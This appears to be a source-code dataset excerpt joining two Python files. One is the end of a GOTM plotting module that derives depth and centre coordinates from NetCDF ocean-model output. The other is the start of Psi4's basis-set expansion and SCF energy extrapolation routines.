self.hname = 'h' if 'h' in ncvars else 'hmean'
self.elevname = None
self.depth2coord['z'] = 'level'
self.depthdim = 'level'
elif 'sigma' in ncdims and 'bathymetry' in ncvars and ('elev' in ncvars or 'elevmean' in ncvars):
# GETM with sigma coordinates
# Depth will be computed from bathymetry(x,y), surface elevation(x,y,t) and sigma(z).
# Depth dimension is called "sigma".
self.defaultcoordinates['sigma'] = 'z'
self.bathymetryname = 'bathymetry'
self.hname = None
self.elevname = 'elev' if 'elev' in ncvars else 'elevmean'
self.depth2coord['z'] = 'sigma'
self.depthdim = 'sigma'
elif 'z' in ncdims:
# GETM or GOTM with z coordinates.
# Depth dimension is called "z".
self.depthdim = 'z'
def getVariableNames_raw(self):
names = list(NetCDFStore.getVariableNames_raw(self))
nc = self.getcdf()
ncvars,ncdims = nc.variables,nc.dimensions
if self.depthdim is not None:
if 'z' not in names: names.append('z')
if 'z1' in ncdims and 'z1' not in names: names.append('z1')
self.generatecartesiancenters = self.generatecartesiancenters or ('xx' in ncvars and 'yx' in ncvars and 'xic' in ncdims and 'etac' in ncdims and 'xc' not in ncvars and 'yc' not in ncvars)
if self.generatecartesiancenters: names += ['xc','yc']
return names
def getVariable_raw(self,varname):
class CenterVariable(NetCDFStore.NetCDFVariable):
def __init__(self,store,ncvarname):
NetCDFStore.NetCDFVariable.__init__(self,store,ncvarname)
self.centername = ncvarname
self.stagname = '%sx' % ncvarname[0]
def getShape(self):
s = self.store[self.stagname].getShape()
return (s[0]-1,s[1]-1)
def getLongName(self):
return '%s-position' % self.centername
def getUnit(self):
return self.store[self.stagname].getUnit()
def getProperties(self):
props = {'history':'auto-generated from boundary coordinates in variable %s' % self.stagname}
props['bounds'] = self.stagname
return props
def getDataType(self):
return self.store[self.stagname].getDataType()
def getDimensions_raw(self):
return ('etac','xic')
def getNcData(self,bounds=None,allowmask=True):
# If no bounds are set, use complete data range.
if bounds is None:
shape = self.getShape()
bounds = (slice(0,shape[0]),slice(0,shape[1]))
# Convert integer indices to slices so we always have 2 dimensions.
fullbounds = []
for b in bounds:
if isinstance(b,int): b = slice(b,b+1)
fullbounds.append(b)
# Obtain all 4 corners
stagvar = self.store[self.stagname]
stagvals = stagvar.getSlice(fullbounds,dataonly=True).copy()
oldbound0 = fullbounds[0]
fullbounds[0] = slice(fullbounds[0].start+1,fullbounds[0].stop+1,fullbounds[0].step)
stagvals += stagvar.getSlice(fullbounds,dataonly=True)
fullbounds[1] = slice(fullbounds[1].start+1,fullbounds[1].stop+1,fullbounds[1].step)
stagvals += stagvar.getSlice(fullbounds,dataonly=True)
fullbounds[0] = oldbound0
stagvals += stagvar.getSlice(fullbounds,dataonly=True)
# Average the corners to obtain center coordinates
centers = stagvals/4.
# Eliminate singleton dimensiuons where integer indices were used.
if bounds is not None:
newshape = []
for l,b in zip(centers.shape,bounds):
if not isinstance(b,int): newshape.append(l)
centers.shape = newshape
# Return center coordinates.
return centers
class DepthVariable(NetCDFStore.NetCDFVariable):
def __init__(self,store,ncvarname,dimname):
NetCDFStore.NetCDFVariable.__init__(self,store,ncvarname)
self.dimname = dimname
self.cacheddims = None
self.cachedshape = None
def getName_raw(self):
return self.dimname
def getLongName(self):
return 'depth'
def getUnit(self):
if self.store.elevname is not None:
return self.store[self.store.elevname].getUnit()
else:
return self.store[self.store.hname].getUnit()
def getProperties(self):
if self.store.bathymetryname is None:
props = {'history':'auto-generated from layer thickness and surface elevation.'}
else:
props = {'history':'auto-generated from sigma levels, elevation and bathymetry.'}
if not self.dimname.endswith('_stag'): props['bounds'] = self.dimname + '_stag'
return props
def getDataType(self):
if self.store.elevname is not None:
return self.store[self.store.elevname].getDataType()
else:
return self.store[self.store.hname].getDataType()
def getDimensions_raw(self):
if self.cacheddims is None:
def addvar(name):
if name is None or name not in self.store: return
curvar = self.store[name]
curdims = curvar.getDimensions_raw()
dims.update(curdims)
for d,l in zip(curdims,curvar.getShape()): dim2length[d] = l
nc = self.store.getcdf()
# Get the set of dimensions (unordered) for all source variables combined.
dims = set((self.store.depthdim,))
dim2length = {self.store.depthdim:self.store.getDimensionLength(self.store.depthdim)[0]}
addvar(self.store.bathymetryname)
addvar(self.store.hname)
addvar(self.store.elevname)
# Order dimensions
for v in nc.variables.values():
if all([d in v.dimensions for d in dims]): break
else:
assert False,'None of the NetCDF variables uses all dimensions that are needed for the depth coordinate.'
self.cacheddims = [d for d in v.dimensions if d in dims]
# Save shape
self.cachedshape = [dim2length[d] for d in self.cacheddims]
if self.dimname.endswith('_stag'):
self.cachedshape = tuple([l+1 for l in self.cachedshape])
# Rename depth dimension
self.izdim = self.cacheddims.index(self.store.depthdim)
centercoord = self.dimname
if self.dimname.endswith('_stag'): centercoord = centercoord[:-5]
dimname = self.store.depth2coord.get(centercoord,centercoord)
if self.dimname.endswith('_stag'): dimname = dimname+'_stag'
self.cacheddims[self.izdim] = dimname
# Re-assign dimensions if needed.
return self.cacheddims
def getShape(self):
if self.cachedshape is None:
self.getDimensions_raw()
return self.cachedshape
def getNcData(self,bounds=None,allowmask=True):
# Return values from cache if available.
if self.dimname in self.store.cachedcoords:
if bounds is None:
return self.store.cachedcoords[self.dimname]
else:
return self.store.cachedcoords[self.dimname][bounds]
cachebasedata = bounds is not None
izdim = self.izdim
# Determine list of dimensions and desired shape for depth source variables
# (bathymetry, elevation, layer heights)
dims = list(self.getDimensions_raw())
dims[izdim] = self.store.depthdim
shape = list(self.getShape())
if self.dimname.endswith('_stag'): shape = [l-1 for l in shape]
if bounds is not None:
# Determine dimension boundaries for the source variables.
assert len(bounds)==len(shape),'Number of bounds (%i) does not match the variable shape (%s)' % (len(bounds),','.join(map(str,shape)))
newbounds = []
for i,l in enumerate(bounds):
if i==izdim:
# depth dimension: we need the complete range.
l = slice(None)
elif isinstance(l,int):
# integer index: convert to slice with length 1 to preserve rank and dimension order.
l = slice(l,l+1)
elif self.dimname.endswith('_stag'):
# If we need staggered coordinates, all dimensions will expand by 1
# in the end. Therefore, subtract 1 from their length here.
l = slice(l.start,l.stop-l.step,l.step)
start,stop,step = l.indices(shape[i])
shape[i] = 1+int((stop-start-1)/step)
newbounds.append(l)
def getvardata(name):
var = self.store[name]
vardims = var.getDimensions_raw()
if bounds is None:
varbounds = None
else:
varbounds = [newbounds[dims.index(d)] for d in vardims]
data = var.getSlice(varbounds,dataonly=True,cache=cachebasedata)
dimlengths = dict(zip(vardims,data.shape))
assert len(vardims)==data.ndim,'%s: number of variable dimensions and array rank do not match.' % name
data.shape = [dimlengths.get(d,1) for d in dims]
return data
def takezrange(array,start,stop=None):
slc = [slice(None)]*array.ndim
if isinstance(start,slice):
slc[izdim] = start
else:
slc[izdim] = slice(start,stop)
return array[slc]
mask = numpy.ma.nomask
data = {}
# Subroutine for creating and updating the depth mask.
def setmask(mask,newmask):
if mask is numpy.ma.nomask:
# Create new depth mask based on provided mask, allowing for broadcasting.
mask = numpy.empty(shape,dtype=numpy.bool)
mask[...] = newmask
else:
# Combine provided mask with existing one.
mask |= newmask
return mask
def getElevations(mask,bath=None):
# Get elevations
elev = getvardata(self.store.elevname)
# If elevations are (partially) masked, first fill the first layer of masked cells around
# the data with a nearest-neighbor approach. This improves the elevations of interfaces.
# Then save the mask so we can reapply it later.
elevmask = numpy.ma.getmask(elev)
if elevmask is not numpy.ma.nomask:
if numpy.any(elevmask):
# Add elevation mask to global depth mask (NB getvardata will have inserted z dimension already).
mask = setmask(mask,elevmask)
# Set masked (land) edges of domain to nearest (in x,y space) neighbouring elevation values.
# This is needed to allow the inference of corner points that fall outside the domain bounded by centre coordinates.
elev = xmlplot.common.interpolateEdges(elev)
elevmask = numpy.ma.getmask(elev)
# Let elevation follow bathymetry where it is still masked.
if bath is not None and elevmask is not numpy.ma.nomask:
bigbath = numpy.empty_like(elev)
bigbath[...] = bath
elev[elevmask] = -bigbath[elevmask]
# Eliminate elevation mask.
# If bathymetry is available, this will be used later to make masked elevations follow bathymetry.
# This will allow all layers in the masked domain to have height zero.
elev = elev.filled(0.)
return elev,mask
def getLayerHeights(mask):
# Get layer heights
h = getvardata(self.store.hname)
# Fill masked values (we do not want coordinate arrays with masked values)
# This should not have any effect, as the value arrays should also be masked at
# these locations.
hmask = numpy.ma.getmask(h)
if hmask is not numpy.ma.nomask:
# Add layer height mask to global depth mask.
mask = setmask(mask,hmask)
# Set masked (land) edges of domain to nearest (in x,y space) neighbouring layer heights.
# This is needed to allow the inference of corner points that fall outside the domain bounded by centre coordinates.
ipaxes = [i for i in range(len(h.shape)) if i!=izdim]
h = xmlplot.common.interpolateEdges(h,dims=ipaxes)
# Fill remaining masked layer heights with zero.
h = h.filled(0.)
return h,mask
def getBathymetry(mask):
# Get bathymetry (distance between geoid/mean sea level and bottom)
bath = getvardata(self.store.bathymetryname)
# Check bathymetry mask.
bathmask = numpy.ma.getmask(bath)
if bathmask is not numpy.ma.nomask:
# Add bathymetry mask to global depth mask.
mask = setmask(mask,bathmask)
# Set masked (land) edges of domain to nearest (in x,y space) neighbouring bahtymetry values.
# This is needed to allow the inference of corner points that fall outside the domain bounded by centre coordinates.
bath = xmlplot.common.interpolateEdges(bath)
# Fill the remaining masked bathymetry with the shallowest value in the domain.
if self.store.elevname is not None:
elev = getvardata(self.store.elevname)
bath = bath.filled(min(bath.min(),-elev.max()))
return bath,mask
# Depth can be reconstructed in three ways:
# elevations + layer heights (GOTM)
# bathymetry + layer heights (GETM, no sigma coordinates)
# bathymetry + elevations + sigma (GETM, sigma coordinates)
if self.store.bathymetryname is None:
# GOTM: reconstruct from elevations + layer heights
# Get elevations
elev,mask = getElevations(mask)
# Get layer heights.
h,mask = getLayerHeights(mask)
# Get depths of interfaces
z_stag = numpy.concatenate((numpy.zeros_like(h.take((0,),axis=izdim)),h.cumsum(axis=izdim)),axis=izdim)
depth = z_stag.take((-1,),axis=izdim)-elev
z_stag -= depth
# Get depths of layer centers
z = takezrange(z_stag,1)-0.5*h
# The actual interface coordinate z1 lacks the bottom interface
z1 = takezrange(z_stag,1)
# Store depth coordinates
data['z'] = z
data['z1'] = z1
if bounds is None or self.dimname in ('z_stag','z1_stag'):
# Use the actual top and bottom of the column as boundary interfaces for the
# grid of the interface coordinate.
z1_stag = numpy.concatenate((numpy.take(z_stag,(0,),axis=izdim),takezrange(z,1),numpy.take(z_stag,(-1,),axis=izdim)),axis=izdim)
# Use normal staggering for the time, longitude and latitude dimension.
remdims = [i for i in range(z_stag.ndim) if i!=izdim]
data['z_stag'] = xmlplot.common.stagger(z_stag, remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
data['z1_stag'] = xmlplot.common.stagger(z1_stag,remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
elif self.store.hname is not None:
# GETM (no sigma coordinates): reconstruct from bathymetry and layer heights
# Get bathymetry
bath,mask = getBathymetry(mask)
# Get layer heights.
h,mask = getLayerHeights(mask)
# Calculate depth of layer interfaces
z_stag = numpy.concatenate((numpy.zeros_like(h.take((0,),axis=izdim)),h.cumsum(axis=izdim)),axis=izdim)
z_stag -= bath
# Get depths of layer centers
z = takezrange(z_stag,1)-0.5*h
# Store depth coordinates
data['z'] = z
if bounds is None or self.dimname=='z_stag':
# Use normal staggering for the time, longitude and latitude dimension.
remdims = [i for i in range(z_stag.ndim) if i!=izdim]
data['z_stag'] = xmlplot.common.stagger(z_stag, remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
else:
# Get bathymetry
bath,mask = getBathymetry(mask)
# Get elevations
elev,mask = getElevations(mask,bath)
# Calculate water depth at each point in time
# Clip it at zero: nearest neighbor interpolation of elevations may have
# caused water levels below the bottom.
depth = numpy.maximum(bath+elev,0.)
# Get sigma levels (constant across time and space)
sigma = getvardata('sigma')
# From sigma levels and water depth, calculate the z coordinates.
data['z'] = sigma*depth + elev
if bounds is None or self.dimname=='z_stag':
# Calculate staggered sigma coordinates
sigma_stag_shape = list(sigma.shape)
sigma_stag_shape[izdim] += 1
sigma_stag = numpy.empty(sigma_stag_shape,dtype=sigma.dtype)
takezrange(sigma_stag,0, 1)[...] = -1.
takezrange(sigma_stag,1,-1)[...] = 0.5*(takezrange(sigma,0,-1)+takezrange(sigma,1))
takezrange(sigma_stag,-1 )[...] = 0.
# First stagger in deth dimension.
z_stag = sigma_stag*depth + elev
# Use default staggering for remaining dimensions of staggered z.
remdims = [i for i in range(z_stag.ndim) if i!=izdim]
data['z_stag'] = xmlplot.common.stagger(z_stag,dimindices=remdims,defaultdeltafunction=self.store.getDefaultCoordinateDelta,dimnames=self.getDimensions_raw())
# Apply the mask (if any) to the center coordinates
if mask is not numpy.ma.nomask:
data['z'] = numpy.ma.masked_where(mask,data['z'],copy=False)
# If we retrieve the entire range, store all coordinates in cache
# and return the slice we need.
if bounds is None:
self.store.cachedcoords.update(data)
return data[self.dimname]
# Retrieve the desired coordinates.
res = data[self.dimname]
# Now finally take the depth range that we need
depthslice = bounds[izdim]
if isinstance(depthslice,int): depthslice = slice(depthslice,depthslice+1)
res = takezrange(res,depthslice)
# Undo the staggering for the dimension that we take a single slice through.
if self.dimname.endswith('_stag'):
# This is a staggered variable - average left and right bounds for indexed dimensions.
for i in range(len(bounds)-1,-1,-1):
if isinstance(bounds[i],int): res = res.mean(axis=i)
else:
# This is a non-staggered variable - take out the indexed dimensions.
res.shape = [l for i,l in enumerate(res.shape) if not isinstance(bounds[i],int)]
return res
if self.generatecartesiancenters and varname in ('xc','yc'):
return CenterVariable(self,varname)
elif varname in ('z','z1','z_stag','z1_stag'):
return DepthVariable(self,varname,varname)
return NetCDFStore.getVariable_raw(self,varname)
def getDefaultCoordinateDelta(self,dimname,coords):
# Only operate on 1D coordinates
if coords.ndim>1: return NetCDFStore.getDefaultCoordinateDelta(self,dimname,coords)
# Only operate on time dimension
try:
timeunit,timeref = self.getTimeReference(dimname)
except ReferenceTimeParseError:
return NetCDFStore.getDefaultCoordinateDelta(self,dimname,coords)
# Take delta as the difference between the reference time and the first time step
if coords[0]>timeref: return coords[0]-timeref
return 1.
class NetCDFStore_MOM4(NetCDFStore):
@staticmethod
def testFile(nc):
match = False
ncvars,ncdims = nc.variables,nc.dimensions
if ('xt_ocean' in ncdims and 'yt_ocean' in ncdims and
'geolon_t' in ncvars and 'geolat_t' in ncvars): match = True
return match
def __init__(self,path=None,*args,**kwargs):
NetCDFStore.__init__(self,path,*args,**kwargs)
def autoReassignCoordinates(self):
NetCDFStore.autoReassignCoordinates(self)
# Re-assign x,y coordinate dimensions to longitude, latitude
nc = self.getcdf()
ncvars,ncdims = nc.variables,nc.dimensions
if ('xt_ocean' in ncdims and 'yt_ocean' in ncdims and
'geolon_t' in ncvars and 'geolat_t' in ncvars):
lon = numpy.ma.compressed(getNcData(ncvars['geolon_t']))
# Only reassign dimension if alternative coordinate values have a meaningful value.
if lon.shape[0]>0 and (lon!=lon[0]).any():
self.defaultcoordinates['xt_ocean' ] = 'geolon_t'
self.defaultcoordinates['yt_ocean'] = 'geolat_t'
if ('xu_ocean' in ncdims and 'yu_ocean' in ncdims and
'geolon_c' in ncvars and 'geolat_c' in ncvars):
lon = numpy.ma.compressed(getNcData(ncvars['geolon_c']))
# Only reassign dimension if alternative coordinate values have a meaningful value.
if lon.shape[0]>0 and (lon!=lon[0]).any():
self.defaultcoordinates['xu_ocean' ] = 'geolon_c'
self.defaultcoordinates['yu_ocean'] = 'geolat_c'
NetCDFStore.registerConvention(NetCDFStore_GOTM)
NetCDFStore.registerConvention(NetCDFStore_MOM4)
|
BoldingBruggeman/gotm
|
gui.py/xmlplot/data/netcdf.py
|
Python
|
gpl-2.0
| 87,431
|
[
"NetCDF"
] |
60b840e869077281b5d23c326a37e92d1aedb6feb4f8722d153e79c0fb2f3a2b
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import math
import re
import sys
from typing import Callable, List
import numpy as np
from psi4 import core
from psi4.driver import qcdb
from psi4.driver import p4util
from psi4.driver import driver_util
from psi4.driver import psifiles as psif
from psi4.driver.p4util.exceptions import *
from psi4.driver.procrouting.interface_cfour import cfour_psivar_list
zeta_values = 'dtq5678'
_zeta_val2sym = {k + 2: v for k, v in enumerate(zeta_values)}
_zeta_sym2val = {v: k for k, v in _zeta_val2sym.items()}
_addlremark = {'energy': '', 'gradient': ', GRADIENT', 'hessian': ', HESSIAN'}
_lmh_labels = {
1: ['HI'],
2: ['LO', 'HI'],
3: ['LO', 'MD', 'HI'],
4: ['LO', 'MD', 'M2', 'HI'],
5: ['LO', 'MD', 'M2', 'M3', 'HI']
}
def _expand_bracketed_basis(basisstring: str, molecule=None):
"""Function to transform and validate basis series specification for cbs().
Parameters
----------
basisstring
A string containing the basis sets to be expanded.
A basis set with no paired square brackets is passed through
with zeta level 0 (e.g., ``'6-31+G(d,p)'`` is returned as
``(["6-31+G(d,p)"], [0])``). A basis set with square brackets is checked
for sensible sequence and returned as separate basis sets
(e.g., ``'cc-pV[Q5]Z'` is returned as ``(["cc-pVQZ", "cc-pV5Z"], [4, 5])``).
Allows out-of-order zeta specification (e.g., ``[qtd]``) and numeral for
number (e.g., ``[23]``). Does not allow skipped zetas (e.g., ``[dq]``), zetas
outside the [2,8] range, non-Dunning, non-Ahlrichs, or non-Jensen sets,
or non-findable .gbs sets.
molecule : qcdb.molecule or psi4.core.Molecule
This function checks that the basis is valid by trying to build
the qcdb.BasisSet object for *molecule* or for H2 if None.
Returns
-------
tuple
Tuple in the ``([basis set names], [basis set zetas])`` format.
"""
BSET = []
ZSET = []
legit_compound_basis = re.compile(
r'^(?P<pre>.*cc-.*|def2-|.*pcs+eg-|.*)\[(?P<zeta>[dtq2345678,s1]*)\](?P<post>.*z.*|)$', re.IGNORECASE)
pc_basis = re.compile(r'.*pcs+eg-$', re.IGNORECASE)
def2_basis = re.compile(r'def2-', re.IGNORECASE)
zapa_basis = re.compile(r'.*zapa.*', re.IGNORECASE)
if legit_compound_basis.match(basisstring):
basisname = legit_compound_basis.match(basisstring)
# handle def2-svp* basis sets as double-zeta
if def2_basis.match(basisname.group('pre')):
bn_gz = basisname.group('zeta').replace("s", "d")
# handle pc-n basis set polarisation -> zeta conversion
elif pc_basis.match(basisname.group('pre')):
bn_gz = basisname.group('zeta').replace("4", "5").replace("3", "4").replace("2", "3").replace("1", "2")
else:
bn_gz = basisname.group('zeta')
# filter out commas and be forgiving of e.g., t5q or 3q
zetas = [z for z in zeta_values if (z in bn_gz or str(zeta_values.index(z) + 2) in bn_gz)]
for b in zetas:
if ZSET and (int(ZSET[len(ZSET) - 1]) - zeta_values.index(b)) != 1:
raise ValidationError("""Basis set '%s' has skipped zeta level '%s'.""" %
(basisstring, _zeta_val2sym[_zeta_sym2val[b] - 1]))
# reassemble def2-svp* properly instead of def2-dzvp*
if def2_basis.match(basisname.group('pre')) and b == "d":
BSET.append(basisname.group('pre') + "s" + basisname.group('post')[1:])
# reassemble pc-n basis sets properly
elif pc_basis.match(basisname.group('pre')):
BSET.append(basisname.group('pre') + "{0:d}".format(_zeta_sym2val[b] - 1))
# assemble nZaPa basis sets
elif zapa_basis.match(basisname.group('post')):
bzapa = b.replace("d", "2").replace("t", "3").replace("q", "4")
BSET.append(basisname.group('pre') + bzapa + basisname.group('post'))
else:
BSET.append(basisname.group('pre') + b + basisname.group('post'))
ZSET.append(zeta_values.index(b) + 2)
elif re.match(r'.*\[.*\].*$', basisstring, flags=re.IGNORECASE):
raise ValidationError(
"""Basis series '%s' invalid. Specify a basis series matching"""
""" '*cc-*[dtq2345678,]*z*'. or 'def2-[sdtq]zvp*' or '*pcs[s]eg-[1234]' or '[1234567]ZaPa' """ %
(basisstring))
else:
BSET.append(basisstring)
ZSET.append(0)
if molecule is None:
molecule = """\nH\nH 1 1.00\n"""
elif isinstance(molecule, core.Molecule):
molecule = qcdb.Molecule(molecule.to_dict())
for basis in BSET:
try:
qcdb.BasisSet.pyconstruct(molecule, "BASIS", basis)
except qcdb.BasisSetNotFound:
e = sys.exc_info()[1]
raise ValidationError(f"""Basis set '{basis}' not available for molecule.""")
return (BSET, ZSET)
def _contract_bracketed_basis(basisarray: List):
"""Function to reform a bracketed basis set string from a sequential series
of basis sets. Essentially the inverse of _expand_bracketed_basis(). Used to
print a nicely formatted basis set string in the results table.
Parameters
----------
basisarray
Basis set names, differing by zeta level, e.g. ``["cc-pvqz", "cc-pv5z"]``.
Returns
-------
string
A nicely formatted basis set string, e.g. ``"cc-pv[q5]z"`` for the above example.
"""
if len(basisarray) == 1:
return basisarray[0]
else:
zetaindx = [i for i in range(len(basisarray[0])) if basisarray[0][i] != basisarray[1][i]][0]
ZSET = [bas[zetaindx] for bas in basisarray]
pre = basisarray[1][:zetaindx]
post = basisarray[1][zetaindx + 1:]
basisstring = pre + '[' + ''.join(ZSET) + ']' + post
return basisstring
def xtpl_highest_1(functionname: str, zHI: int, valueHI: float, verbose: bool = True, **kwargs):
r"""Scheme for total or correlation energies with a single basis or the highest
zeta-level among an array of bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zHI
Zeta-level, only used for printing.
valueHI
Value of the CBS component.
Returns
-------
float
Returns :math:`E_{total}^{\infty}` which is equal to valueHI.
Notes
-----
.. math:: E_{total}^X = E_{total}^{\infty}
"""
if isinstance(valueHI, float):
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> %s <==\n\n""" % (functionname.upper())
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
core.print_out(cbsscheme)
return valueHI
elif isinstance(valueHI, (core.Matrix, core.Vector)):
if verbose > 2:
core.print_out(""" HI-zeta (%s) Total Energy:\n""" % (str(zHI)))
valueHI.print_out()
return valueHI
def scf_xtpl_helgaker_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme using exponential form for reference energies with two adjacent
zeta-level bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 1.63`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [1]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta e^{-\alpha X}, \alpha = 1.63`
References
----------
.. [1] Halkier, Helgaker, Jorgensen, Klopper, & Olsen, Chem. Phys. Lett. 302 (1999) 437-446,
DOI: 10.1016/S0009-2614(99)00179-7
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"scf_xtpl_helgaker_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 1.63
beta_division = 1 / (math.exp(-1 * alpha * zLO) * (math.exp(-1 * alpha) - 1))
beta_mult = math.exp(-1 * alpha * zHI)
if isinstance(valueLO, float):
beta = (valueHI - valueLO) * beta_division
value = valueHI - beta * beta_mult
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Helgaker 2-point exponential SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.name = 'Helgaker SCF (%s, %s) beta' % (zLO, zHI)
beta.subtract(valueLO)
beta.scale(beta_division)
beta.scale(beta_mult)
value = valueHI.clone()
value.subtract(beta)
value.name = 'Helgaker SCF (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Helgaker 2-point exponential SCF extrapolation for method: %s <==\n\n""" %
(functionname.upper()))
core.print_out(""" LO-zeta (%s)""" % str(zLO))
core.print_out(""" LO-zeta Data""")
valueLO.print_out()
core.print_out(""" HI-zeta (%s)""" % str(zHI))
core.print_out(""" HI-zeta Data""")
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % (alpha))
core.print_out(""" Beta Data:\n""")
beta.print_out()
return value
else:
raise ValidationError("scf_xtpl_helgaker_2: datatype is not recognized '%s'." % type(valueLO))
def scf_xtpl_truhlar_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme using power form for reference energies with two adjacent
zeta-level bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 3.4`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [2]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta X^{-\alpha}, \alpha = 3.4`
References
----------
.. [2] Truhlar, Chem. Phys. Lett. 294 (1998) 45-48,
DOI: 10.1016/S0009-2614(98)00866-5
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"scf_xtpl_truhlar_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 3.40
beta_division = 1 / (zHI**(-1 * alpha) - zLO**(-1 * alpha))
beta_mult = zHI**(-1 * alpha)
if isinstance(valueLO, float):
beta = (valueHI - valueLO) * beta_division
value = valueHI - beta * beta_mult
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Truhlar 2-point power form SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.name = 'Truhlar SCF (%s, %s) beta' % (zLO, zHI)
beta.subtract(valueLO)
beta.scale(beta_division)
beta.scale(beta_mult)
value = valueHI.clone()
value.subtract(beta)
value.name = 'Truhlar SCF (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Truhlar 2-point power from SCF extrapolation for method: %s <==\n\n""" %
(functionname.upper()))
core.print_out(""" LO-zeta (%s)""" % str(zLO))
core.print_out(""" LO-zeta Data""")
valueLO.print_out()
core.print_out(""" HI-zeta (%s)""" % str(zHI))
core.print_out(""" HI-zeta Data""")
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % (alpha))
core.print_out(""" Beta Data:\n""")
beta.print_out()
return value
else:
raise ValidationError("scf_xtpl_truhlar_2: datatype is not recognized '%s'." % type(valueLO))
def scf_xtpl_karton_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme using root-power form for reference energies with two adjacent
zeta-level bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 6.3`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [3]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta e^{-\alpha\sqrt{X}}, \alpha = 6.3`
References
----------
.. [3] Karton, Martin, Theor. Chem. Acc. 115 (2006) 330-333,
DOI: 10.1007/s00214-005-0028-6
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"scf_xtpl_karton_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 6.30
